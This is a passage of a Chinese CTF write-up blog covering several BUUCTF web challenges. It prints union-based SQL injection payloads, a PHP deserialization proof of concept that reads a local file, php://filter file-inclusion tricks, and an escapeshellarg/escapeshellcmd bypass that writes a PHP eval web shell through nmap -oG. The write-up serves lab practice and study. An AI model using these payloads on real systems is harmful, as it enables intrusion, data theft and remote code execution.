<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br></pre></td><td class="code"><pre><span class="line">?no=1 order by 4</span><br><span class="line"></span><br><span class="line">?no=-1 union/**/select/**/1,2,3,4</span><br><span class="line"></span><br><span class="line">?no=-1 union/**/select/**/1,group_concat(schema_name),3,4/**/from/**/information_schema.schemata</span><br><span class="line"></span><br><span class="line">?no=-1 union/**/select/**/1,group_concat(table_name),3,4/**/from/**/information_schema.tables/**/where/**/table_schema=&#x27;fakebook&#x27;</span><br><span class="line"></span><br><span class="line">?no=-1 union/**/select/**/1,group_concat(column_name),3,4/**/from/**/information_schema.columns/**/where/**/table_name=&#x27;users&#x27;</span><br><span class="line"></span><br><span class="line">?no=-1 union/**/select/**/1,group_concat(no,&#x27;~&#x27;,username,&#x27;~&#x27;,passwd,&#x27;~&#x27;,data),3,4/**/from/**/fakebook.users</span><br></pre></td></tr></table></figure>
<p>构造反序列化POC</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line">&lt;?php</span><br><span class="line">class UserInfo</span><br><span class="line">&#123;</span><br><span class="line">    public $name = &quot;057&quot;;</span><br><span class="line">    public $age = 19;</span><br><span class="line">    public $blog = &quot;file:///var/www/html/flag.php&quot;;</span><br><span class="line"></span><br><span class="line">&#125;</span><br><span class="line">$res = new UserInfo();</span><br><span class="line">echo serialize($res);</span><br></pre></td></tr></table></figure>
<p><code>O:8:&quot;UserInfo&quot;:3:&#123;s:4:&quot;name&quot;;s:3:&quot;057&quot;;s:3:&quot;age&quot;;i:19;s:4:&quot;blog&quot;;s:29:&quot;file:///var/www/html/flag.php&quot;;&#125;</code><br>payload<br><code>?no=-1 union/**/select/**/1,2,3,&#39;O:8:&quot;UserInfo&quot;:3:&#123;s:4:&quot;name&quot;;s:3:&quot;057&quot;;s:3:&quot;age&quot;;i:19;s:4:&quot;blog&quot;;s:29:&quot;file:///var/www/html/flag.php&quot;;&#125;&#39;</code><br>查看源码发现flag</p>
<h1 id="BSidesCF-2020-Had-a-bad-day"><a href="#BSidesCF-2020-Had-a-bad-day" class="headerlink" title="[BSidesCF 2020]Had a bad day"></a>[BSidesCF 2020]Had a bad day</h1><p>打开环境，点击woofers和meowers发现出现了图片并且url会发生改变<br><code>http://f9389818-cc6c-4bba-994e-3c38b29f94e4.node4.buuoj.cn:81/index.php?category=woofers</code><br>猜测是文件包含漏洞或是sql注入<br>随便更改一下url发现报错了<br><img src="/images/buu/4-1.png" alt="1"><br>根据报错提示知道了是文件包含漏洞<br>直接包含&#x2F;flag发现包含不到，先用php:&#x2F;&#x2F;filter伪协议读一下index.php源码看看：<br><code>index.php?category=php://filter/read=convert.base64-encode/resource=index.php</code><br>发现报错了，根据报错知道它自己会在文件后面加上.php，导致变成index.php.php读取失败，删掉.php再尝试发现成功了，读到了源码，base64解码后<br>&#96;<br><?php
　　$file = $_GET['category'];
　　
　　if(isset($file))
　　{
　　　　if( strpos( $file, "woofers" ) !==  false || strpos( $file, "meowers" ) !==  false || strpos( $file, "index")){   //必须含有woofers或meowers或index字符串
　　　　　　include ($file . '.php');  //参数后拼接.php
　　　　}
　　　　else{
　　　　　　echo "Sorry, we currently only support woofers and meowers.";
　　　　}
　　}
?></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br></pre></td><td class="code"><pre><span class="line">加下来尝试读取flag.php</span><br><span class="line">`index.php?category=woofers/../flag`</span><br><span class="line">查看源码出现了别的内容，包含成功了flag.php，但是这里也说了flag需要读取</span><br><span class="line">![1](/images/buu/4-2.png)</span><br><span class="line">这里卡了好久，后来看了几位师傅才知道php://filter伪协议可以套一层协议，就像：</span><br><span class="line">`/index.php?category=php://filter/convert.base64-encode/index/resource=flag`</span><br><span class="line">套一个字符index符合条件并且传入flag，读取flag.php</span><br><span class="line">最后base64解码得到flag</span><br><span class="line"></span><br><span class="line"># [BUUCTF 2018]Online Tool</span><br><span class="line">先代码审计，发现了两个没见过的函数escapeshellarg($host)和escapeshellcmd($host);</span><br><span class="line">大佬的[博客]（https://paper.seebug.org/164/）讲的很清楚</span><br></pre></td></tr></table></figure>
<p>传入的参数是：172.17.0.2’ -v -d a&#x3D;1</p>
<p>经过escapeshellarg处理后变成了’172.17.0.2’&#39;‘ -v -d a&#x3D;1’，即先对单引号转义，再用单引号将左右两部分括起来从而起到连接的作用。</p>
<p>经过escapeshellcmd处理后变成’172.17.0.2’\‘’ -v -d a&#x3D;1&#39;，这是因为escapeshellcmd对\以及最后那个不配对儿的引号进行了转义：<a target="_blank" rel="noopener" href="http://php.net/manual/zh/function.escapeshellcmd.php">http://php.net/manual/zh/function.escapeshellcmd.php</a></p>
<p>最后执行的命令是curl ‘172.17.0.2’\‘’ -v -d a&#x3D;1&#39;，由于中间的\被解释为\而不再是转义字符，所以后面的’没有被转义，与再后面的’配对儿成了一个空白连接符。所以可以简化为curl 172.17.0.2\ -v -d a&#x3D;1’，即向172.17.0.2\发起请求，POST 数据为a&#x3D;1’。</p>
<p>然后往下看，看到echo system(“nmap -T5 -sT -Pn –host-timeout 2 -F “.$host);</p>
<p>这有个system来执行命令，而且有传参，肯定是利用这里了</p>
<p>这里代码的本意是希望我们输入ip这样的参数做一个扫描，通过上面的两个函数来进行规则过滤转译，我们的输入会被单引号引起来，但是因为我们看到了上面的漏洞所以我们可以逃脱这个引号的束缚</p>
<p>这里常见的命令后注入操作如 | &amp; &amp;&amp;都不行，虽然我们通过上面的操作逃过了单引号，但escapeshellcmd会对这些特殊符号前面加上\来转移…</p>
<p>这时候就只有想想能不能利用nmap来做些什么了。</p>
<p>这时候搜索可以发现在nmap命令中 有一个参数-oG可以实现将命令和结果写到文件</p>
<p>这个命令就是我们的输入可控！然后写入到文件！OK很自然的想到了上传一个一句话木马了…</p>
<p>payload<br><code>?host=&#39; &lt;?php eval($_POST[&quot;v&quot;]);?&gt; -oG shell.php &#39;</code><br>两边加单引号是因为，不加的话，两个函数执行后会变成：<br>&#96;’<?php eval($_POST["v"]);?> -oG shell.php’<br>就不是一条命令了，而是一串字符串而已，因为在解析单引号的时候 , 被单引号包裹的内容中如果有变量 , 这个变量名是不会被解析成值的，但是双引号不同 , bash 会将变量名解析成变量的值再使用。</p>
<p>引号旁边加空格是因为，如果不加，当两个函数执行并echo出来后就会变成：<br><code>\&lt;?php eval($_POST[&quot;v&quot;]);?&gt; -oG shell.php\\</code><br>文件名变成shell.php\，而不是shell.php</p>
<p>最后会返回文件夹名，使用蚁剑连接即可<br><img src="/images/buu/4-3.png" alt="1"></p>

    </div>

    
    
    

      <footer class="post-footer">

        


        
    <div class="post-nav">
      <div class="post-nav-item">
    <a href="/2023/07/03/php%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96/" rel="prev" title="php反序列化">
      <i class="fa fa-chevron-left"></i> php反序列化
    </a></div>
      <div class="post-nav-item">
    <a href="/2023/07/16/preg-replace-e%E6%A8%A1%E5%BC%8F%E4%B8%8B%E7%9A%84%E4%BB%A3%E7%A0%81%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E/" rel="next" title="preg_replace /e模式下的代码执行漏洞">
      preg_replace /e模式下的代码执行漏洞 <i class="fa fa-chevron-right"></i>
    </a></div>
    </div>
      </footer>
    
  </article>
  
  
  



          </div>
          

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      let activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      let commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

        </div>
          
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line toggle-line-first"></span>
    <span class="toggle-line toggle-line-middle"></span>
    <span class="toggle-line toggle-line-last"></span>
  </div>

  <aside class="sidebar">
    <div class="sidebar-inner">

      <ul class="sidebar-nav motion-element">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <!--noindex-->
      <div class="post-toc-wrap sidebar-panel">
          <div class="post-toc motion-element"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#BJDCTF2020-Easy-MD5"><span class="nav-number">1.</span> <span class="nav-text">[BJDCTF2020]Easy MD5</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%8A%A4%E7%BD%91%E6%9D%AF-2018-easy-tornado"><span class="nav-number">2.</span> <span class="nav-text">[护网杯 2018]easy_tornado</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#HCTF-2018-admin-1"><span class="nav-number">3.</span> <span class="nav-text">[HCTF 2018]admin 1</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E6%9E%81%E5%AE%A2%E5%A4%A7%E6%8C%91%E6%88%98-2019-HardSQL"><span class="nav-number">4.</span> <span class="nav-text">[极客大挑战 2019]HardSQL</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E7%BD%91%E9%BC%8E%E6%9D%AF-2020-%E9%9D%92%E9%BE%99%E7%BB%84-AreUSerialz"><span class="nav-number">5.</span> <span class="nav-text">[网鼎杯 2020 青龙组]AreUSerialz</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#%E7%BD%91%E9%BC%8E%E6%9D%AF-2018-Fakebook"><span class="nav-number">6.</span> <span class="nav-text">[网鼎杯 2018]Fakebook</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#BSidesCF-2020-Had-a-bad-day"><span class="nav-number">7.</span> <span class="nav-text">[BSidesCF 2020]Had a bad day</span></a></li></ol></div>
      </div>
      <!--/noindex-->

      <div class="site-overview-wrap sidebar-panel">
        <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">lwq</p>
  <div class="site-description" itemprop="description"></div>
</div>
<div class="site-state-wrap motion-element">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives/">
        
          <span class="site-state-item-count">25</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
        <span class="site-state-item-count">1</span>
        <span class="site-state-item-name">标签</span>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">lwq</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://pisces.theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a> 强力驱动
  </div>

        








      </div>
    </footer>
  </div>

  
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  

</body>
</html>
